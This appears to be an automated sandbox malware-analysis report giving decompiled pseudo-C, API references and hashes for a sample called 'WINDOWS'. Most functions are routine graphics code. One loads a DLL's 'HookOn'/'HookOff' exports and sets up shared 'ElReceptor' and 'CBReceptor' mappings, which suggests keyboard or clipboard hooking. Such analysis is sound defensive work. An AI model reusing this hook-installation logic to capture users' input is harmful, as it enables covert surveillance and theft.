                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                    • API String ID: 667068680-597814768
                                                    • Opcode ID: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                    • Instruction ID: 313d851134716cbfac540d50d26340a817d4ff9888428074853f25f373159611
                                                    • Opcode Fuzzy Hash: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                    • Instruction Fuzzy Hash: FD311FB0A48250AFDB10EFBADD86F5633A4EB153007108A77B404DF296C6BDE8409B5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426204 Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 52%
                                                    			E00426204(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x49de34; // 0x49b0ec
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L004072E0();
					_v20 = E00426060(0);
					_push(_t177);
					_push(0x426484);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L004072D8();
					_v24 = E00426060(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x49e894; // 0x770805ad
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L00407440();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L00407440();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x49e894; // 0x770805ad
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L00407440();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L00407440();
						_v40 = _t135;
					}
					_push(_v20);
					L00407418();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(0x42648b);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L00407440();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L004072D8();
					_v24 = E00426060(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x4262d7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407A44(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(0x42648b);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}


























                                                    0x00426205
                                                    0x00426207
                                                    0x0042620d
                                                    0x00426210
                                                    0x00426213
                                                    0x00426215
                                                    0x00426218
                                                    0x0042621b
                                                    0x0042621f
                                                    0x00426227
                                                    0x004262e0
                                                    0x004262e3
                                                    0x004262e5
                                                    0x004262ef
                                                    0x004262f4
                                                    0x004262f5
                                                    0x004262fa
                                                    0x004262fd
                                                    0x00426300
                                                    0x00426301
                                                    0x00426305
                                                    0x00426306
                                                    0x00426310
                                                    0x00426320
                                                    0x00426323
                                                    0x00426325
                                                    0x0042632a
                                                    0x0042632b
                                                    0x0042632e
                                                    0x0042632f
                                                    0x00426334
                                                    0x00426337
                                                    0x0042633c
                                                    0x00426340
                                                    0x00426341
                                                    0x0042634a
                                                    0x00426360
                                                    0x00426362
                                                    0x00426367
                                                    0x00426368
                                                    0x0042636b
                                                    0x0042636c
                                                    0x00426371
                                                    0x0042634c
                                                    0x0042634c
                                                    0x00426351
                                                    0x00426352
                                                    0x00426355
                                                    0x00426356
                                                    0x0042635b
                                                    0x0042635b
                                                    0x00426377
                                                    0x00426378
                                                    0x0042639a
                                                    0x004263bc
                                                    0x004263c9
                                                    0x004263d7
                                                    0x004263fe
                                                    0x00426423
                                                    0x0042642d
                                                    0x00426437
                                                    0x00426440
                                                    0x0042644a
                                                    0x0042644a
                                                    0x00426453
                                                    0x0042645a
                                                    0x0042645d
                                                    0x00426460
                                                    0x00426469
                                                    0x0042646b
                                                    0x00426470
                                                    0x00426474
                                                    0x00426475
                                                    0x00426475
                                                    0x00426483
                                                    0x0042623f
                                                    0x0042623f
                                                    0x00426241
                                                    0x00426246
                                                    0x00426247
                                                    0x00426251
                                                    0x00426261
                                                    0x00426266
                                                    0x00426267
                                                    0x0042626c
                                                    0x0042626f
                                                    0x004262ab
                                                    0x004262b2
                                                    0x004262b5
                                                    0x004262b8
                                                    0x004262ca
                                                    0x004262d6
                                                    0x004262d6

                                                    APIs
                                                    • 733AA520.GDI32(?,00000001,00000001), ref: 00426247
                                                    • SelectObject.GDI32(?,?), ref: 0042625C
                                                    • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,004262D7,?,?), ref: 004262AB
                                                    • SelectObject.GDI32(?,?), ref: 004262C5
                                                    • DeleteObject.GDI32(?), ref: 004262D1
                                                    • 733AA590.GDI32(00000000), ref: 004262E5
                                                    • 733AA520.GDI32(?,?,?,00000000,00426484,?,00000000), ref: 00426306
                                                    • SelectObject.GDI32(?,?), ref: 0042631B
                                                    • 733AB410.GDI32(?,770805AD,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 0042632F
                                                    • 733AB410.GDI32(?,?,00000000,?,770805AD,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 00426341
                                                    • 733AB410.GDI32(?,00000000,000000FF,?,?,00000000,?,770805AD,00000000,?,?,?,?,?,00000000,00426484), ref: 00426356
                                                    • 733AB410.GDI32(?,770805AD,000000FF,?,?,00000000,?,770805AD,00000000,?,?,?,?,?,00000000,00426484), ref: 0042636C
                                                    • 733AB150.GDI32(?,?,770805AD,000000FF,?,?,00000000,?,770805AD,00000000,?,?,?,?,?,00000000), ref: 00426378
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042639A
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 004263BC
                                                    • SetTextColor.GDI32(?,00000000), ref: 004263C4
                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004263D2
                                                    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004263FE
                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426423
                                                    • SetTextColor.GDI32(?,?), ref: 0042642D
                                                    • SetBkColor.GDI32(?,?), ref: 00426437
                                                    • SelectObject.GDI32(?,00000000), ref: 0042644A
                                                    • DeleteObject.GDI32(?), ref: 00426453
                                                    • 733AB410.GDI32(?,00000000,00000000,0042648B,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00426475
                                                    • DeleteDC.GDI32(?), ref: 0042647E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                    • String ID:
                                                    • API String ID: 3348367721-0
                                                    • Opcode ID: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                    • Instruction ID: aac08ee918962813e68096157f6589243fc941b0343c0b747259aa04d8bf8f88
                                                    • Opcode Fuzzy Hash: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                    • Instruction Fuzzy Hash: 7681A6B1A44218AFDB50EE99CD81FAF7BECAB0D714F510559FA18F7281C238AD008B75
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004764E4 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 144filelibraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E004764E4(void* __eax, void* __ebx, void __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				struct HINSTANCE__* _t30;
				intOrPtr _t46;
				intOrPtr _t70;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				void _t97;
				void* _t99;
				intOrPtr _t102;

				_push(0);
				_t97 = __ecx;
				_t74 = __edx;
				_t99 = __eax;
				_push(_t102);
				_push(0x476697);
				_push( *[fs:eax]);
				 *[fs:eax] = _t102;
				if(__edx == 0) {
					if( *((intOrPtr*)(__eax + 0x48)) != 0) {
						 *((intOrPtr*)(__eax + 0x48))();
					}
					_t30 =  *(_t99 + 0x40);
					if(_t30 != 0) {
						FreeLibrary(_t30);
					}
					if( *(_t99 + 0x30) != 0) {
						UnmapViewOfFile( *(_t99 + 0x38));
						UnmapViewOfFile( *(_t99 + 0x3c));
						CloseHandle( *(_t99 + 0x30));
						CloseHandle( *(_t99 + 0x34));
					}
				} else {
					_t82 =  *0x49ec58; // 0x0
					E0047671C(__edx, _t82, __edx, __ecx, __eax);
					_t46 =  *0x49ec5c; // 0x0
					 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t46));
					if( *(_t99 + 0x40) == 0) {
						_t86 =  *0x49ec58; // 0x0
						E00404CCC( &_v8, _t86, 0x4766ac);
						E0047671C(_t74, _v8, _t74, _t97, _t99);
						_t70 =  *0x49ec5c; // 0x0
						 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t70));
					}
					 *((intOrPtr*)(_t99 + 0x44)) = GetProcAddress( *(_t99 + 0x40), "HookOn");
					 *((intOrPtr*)(_t99 + 0x48)) = GetProcAddress( *(_t99 + 0x40), "HookOff");
					if( *((intOrPtr*)(_t99 + 0x44)) == 0 ||  *((intOrPtr*)(_t99 + 0x48)) == 0) {
						E0040D144(0x4766c8, 1);
						E00404378();
					}
					_t75 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "ElReceptor");
					 *(_t99 + 0x30) = _t75;
					if(_t75 == 0) {
						E0040D144(0x4766f8, 1);
						E00404378();
					}
					_t76 = MapViewOfFile( *(_t99 + 0x30), 2, 0, 0, 0);
					 *(_t99 + 0x38) = _t76;
					 *_t76 = _t97;
					_t77 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "CBReceptor");
					 *(_t99 + 0x34) = _t77;
					if(_t77 == 0) {
						E0040D144(0x4766f8, 1);
						E00404378();
					}
					_t78 = MapViewOfFile( *(_t99 + 0x34), 2, 0, 0, 0);
					 *(_t99 + 0x3c) = _t78;
					 *_t78 = _t97;
					 *((intOrPtr*)(_t99 + 0x44))();
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(0x47669e);
				return E004049C0( &_v8);
			}


















                                                    0x004764e7
                                                    0x004764ec
                                                    0x004764ee
                                                    0x004764f0
                                                    0x004764f4
                                                    0x004764f5
                                                    0x004764fa
                                                    0x004764fd
                                                    0x00476502
                                                    0x00476645
                                                    0x00476647
                                                    0x00476647
                                                    0x0047664a
                                                    0x0047664f
                                                    0x00476652
                                                    0x00476652
                                                    0x0047665b
                                                    0x00476661
                                                    0x0047666a
                                                    0x00476673
                                                    0x0047667c
                                                    0x0047667c
                                                    0x00476508
                                                    0x00476508
                                                    0x00476512
                                                    0x00476517
                                                    0x00476527
                                                    0x0047652e
                                                    0x00476533
                                                    0x0047653e
                                                    0x0047654a
                                                    0x0047654f
                                                    0x0047655f
                                                    0x0047655f
                                                    0x00476570
                                                    0x00476581
                                                    0x00476588
                                                    0x0047659c
                                                    0x004765a1
                                                    0x004765a1
                                                    0x004765ba
                                                    0x004765bc
                                                    0x004765c1
                                                    0x004765cf
                                                    0x004765d4
                                                    0x004765d4
                                                    0x004765ea
                                                    0x004765ec
                                                    0x004765ef
                                                    0x00476605
                                                    0x00476607
                                                    0x0047660c
                                                    0x0047661a
                                                    0x0047661f
                                                    0x0047661f
                                                    0x00476635
                                                    0x00476637
                                                    0x0047663a
                                                    0x0047663c
                                                    0x0047663c
                                                    0x00476683
                                                    0x00476686
                                                    0x00476689
                                                    0x00476696

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00476697,?,?,?,?,00000000), ref: 00476522
                                                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00476697), ref: 0047655A
                                                    • GetProcAddress.KERNEL32(00000000,HookOn), ref: 0047656B
                                                    • GetProcAddress.KERNEL32(00000000,HookOff), ref: 0047657C
                                                    • CreateFileMappingA.KERNEL32 ref: 004765B5
                                                    • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,ElReceptor,00000000,HookOff,00000000,HookOn), ref: 004765E5
                                                    • CreateFileMappingA.KERNEL32 ref: 00476600
                                                    • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,CBReceptor,?,00000002,00000000,00000000,00000000), ref: 00476630
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476652
                                                    • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476661
                                                    • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 0047666A
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476673
                                                    • CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047667C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$View$Library$AddressCloseCreateHandleLoadMappingProcUnmap$Free
                                                    • String ID: CBReceptor$ElReceptor$HookOff$HookOn
                                                    • API String ID: 2408097603-676361416
                                                    • Opcode ID: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                    • Instruction ID: bf3a7df91238c31d5b8269ba8868fe670cbdf993f40fb106005159f73c36cbb0
                                                    • Opcode Fuzzy Hash: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                    • Instruction Fuzzy Hash: 534163B0700B00ABD730BBB6DD86B5677E5AB44708F91453FF649AB6D1CA79B8048B0C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A510 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 65%
                                                    			E0042A510(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E0040275C(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x42aa2d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x42aa00);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00403BBC(1);
						if(_a4 == 0) {
							E004032B4( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E0041D93C(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t251 = _v64;
					E004032B4(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E00425F40();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E0041D8CC(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E004261D0( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E0041D8CC(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E004261F0( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E00426498(_v32);
				}
				_push(0);
				L00407638();
				_v16 = E00426060(_t160);
				_push(_t323);
				_push(0x42a97b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x49b620 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L004072E8();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040E79C(_t245, _t257, _t317, _t321);
							} else {
								E00425F40();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E0041D8CC(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x42a94a;
						 *[fs:eax] = _t290;
						_push(0x42a982);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L00407888();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E0040275C(_t321);
					_push(_t323);
					_push(0x42a8e3);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E0041D8CC(_v12, _t321, _v24);
					_push(_v16);
					L004072E0();
					_v20 = E00426060(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L004072D8();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E00426750(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L00407440();
						_v56 = _t204;
						_push(_v20);
						L00407418();
					}
					_push(_t323);
					_push(0x42a8b7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L004072F0();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040E79C(_t245, _t263, _t317, _t321);
						} else {
							E00425F40();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x42a8be);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L00407440();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}




















































                                                    0x0042a510
                                                    0x0042a511
                                                    0x0042a513
                                                    0x0042a51c
                                                    0x0042a51e
                                                    0x0042a521
                                                    0x0042a526
                                                    0x0042a52b
                                                    0x0042a530
                                                    0x0042a540
                                                    0x0042a547
                                                    0x0042a54f
                                                    0x0042a551
                                                    0x0042a551
                                                    0x0042a568
                                                    0x0042a56e
                                                    0x0042a573
                                                    0x0042a574
                                                    0x0042a579
                                                    0x0042a57c
                                                    0x0042a581
                                                    0x0042a582
                                                    0x0042a587
                                                    0x0042a58a
                                                    0x0042a591
                                                    0x0042a5f0
                                                    0x0042a5f3
                                                    0x0042a5f9
                                                    0x0042a5ff
                                                    0x0042a619
                                                    0x0042a620
                                                    0x0042a62f
                                                    0x0042a634
                                                    0x0042a642
                                                    0x0042a64e
                                                    0x0042a64e
                                                    0x0042a65e
                                                    0x0042a66e
                                                    0x0042a682
                                                    0x0042a691
                                                    0x0042a6a3
                                                    0x0042a6a9
                                                    0x0042a6a9
                                                    0x0042a593
                                                    0x0042a5a3
                                                    0x0042a5a6
                                                    0x0042a5b2
                                                    0x0042a5b7
                                                    0x0042a5bd
                                                    0x0042a5c4
                                                    0x0042a5cb
                                                    0x0042a5d3
                                                    0x0042a5d7
                                                    0x0042a5d7
                                                    0x0042a6ac
                                                    0x0042a6b2
                                                    0x0042a6ba
                                                    0x0042a6c2
                                                    0x0042a6c4
                                                    0x0042a6c4
                                                    0x0042a6cd
                                                    0x0042a6cf
                                                    0x0042a6d7
                                                    0x0042a6e3
                                                    0x0042a6f0
                                                    0x0042a6f5
                                                    0x0042a6f9
                                                    0x0042a6f9
                                                    0x0042a6e3
                                                    0x0042a6d7
                                                    0x0042a700
                                                    0x0042a70b
                                                    0x0042a70b
                                                    0x0042a711
                                                    0x0042a71d
                                                    0x0042a726
                                                    0x0042a738
                                                    0x0042a73e
                                                    0x0042a740
                                                    0x0042a74c
                                                    0x0042a756
                                                    0x0042a75b
                                                    0x0042a75e
                                                    0x0042a75e
                                                    0x0042a761
                                                    0x0042a766
                                                    0x0042a768
                                                    0x0042a768
                                                    0x0042a76e
                                                    0x0042a773
                                                    0x0042a773
                                                    0x0042a778
                                                    0x0042a77a
                                                    0x0042a784
                                                    0x0042a789
                                                    0x0042a78a
                                                    0x0042a78f
                                                    0x0042a792
                                                    0x0042a798
                                                    0x0042a79d
                                                    0x0042a7ab
                                                    0x0042a8ea
                                                    0x0042a8ec
                                                    0x0042a8f1
                                                    0x0042a8f2
                                                    0x0042a8f7
                                                    0x0042a8f8
                                                    0x0042a8fb
                                                    0x0042a8fc
                                                    0x0042a901
                                                    0x0042a908
                                                    0x0042a917
                                                    0x0042a920
                                                    0x0042a919
                                                    0x0042a919
                                                    0x0042a919
                                                    0x0042a917
                                                    0x0042a927
                                                    0x0042a92d
                                                    0x0042a930
                                                    0x0042a93b
                                                    0x0042a942
                                                    0x0042a945
                                                    0x0042a964
                                                    0x0042a967
                                                    0x0042a96a
                                                    0x0042a96f
                                                    0x0042a972
                                                    0x0042a973
                                                    0x0042a975
                                                    0x0042a97a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0042a7b1
                                                    0x0042a7b1
                                                    0x0042a7b3
                                                    0x0042a7bd
                                                    0x0042a7c2
                                                    0x0042a7c3
                                                    0x0042a7c8
                                                    0x0042a7cb
                                                    0x0042a7d1
                                                    0x0042a7d6
                                                    0x0042a7de
                                                    0x0042a7df
                                                    0x0042a7e9
                                                    0x0042a7ec
                                                    0x0042a7ee
                                                    0x0042a7f0
                                                    0x0042a7f3
                                                    0x0042a7f4
                                                    0x0042a803
                                                    0x0042a808
                                                    0x0042a80e
                                                    0x0042a813
                                                    0x0042a815
                                                    0x0042a821
                                                    0x0042a824
                                                    0x0042a829
                                                    0x0042a82a
                                                    0x0042a82d
                                                    0x0042a82e
                                                    0x0042a833
                                                    0x0042a839
                                                    0x0042a83a
                                                    0x0042a83a
                                                    0x0042a841
                                                    0x0042a842
                                                    0x0042a847
                                                    0x0042a84a
                                                    0x0042a84d
                                                    0x0042a84f
                                                    0x0042a852
                                                    0x0042a856
                                                    0x0042a857
                                                    0x0042a859
                                                    0x0042a85a
                                                    0x0042a85d
                                                    0x0042a85e
                                                    0x0042a863
                                                    0x0042a86a
                                                    0x0042a873
                                                    0x0042a87c
                                                    0x0042a875
                                                    0x0042a875
                                                    0x0042a875
                                                    0x0042a873
                                                    0x0042a883
                                                    0x0042a886
                                                    0x0042a889
                                                    0x0042a892
                                                    0x0042a894
                                                    0x0042a899
                                                    0x0042a89d
                                                    0x0042a89e
                                                    0x0042a89e
                                                    0x0042a8b6
                                                    0x0042a8b6

                                                    APIs
                                                    • 733AAC50.USER32(00000000,?,00000000,0042AA2D,?,?), ref: 0042A77A
                                                    • 733AA590.GDI32(00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7DF
                                                    • 733AA520.GDI32(00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7F4
                                                    • SelectObject.GDI32(?,00000000), ref: 0042A7FE
                                                    • 733AB410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000), ref: 0042A82E
                                                    • 733AB150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B), ref: 0042A83A
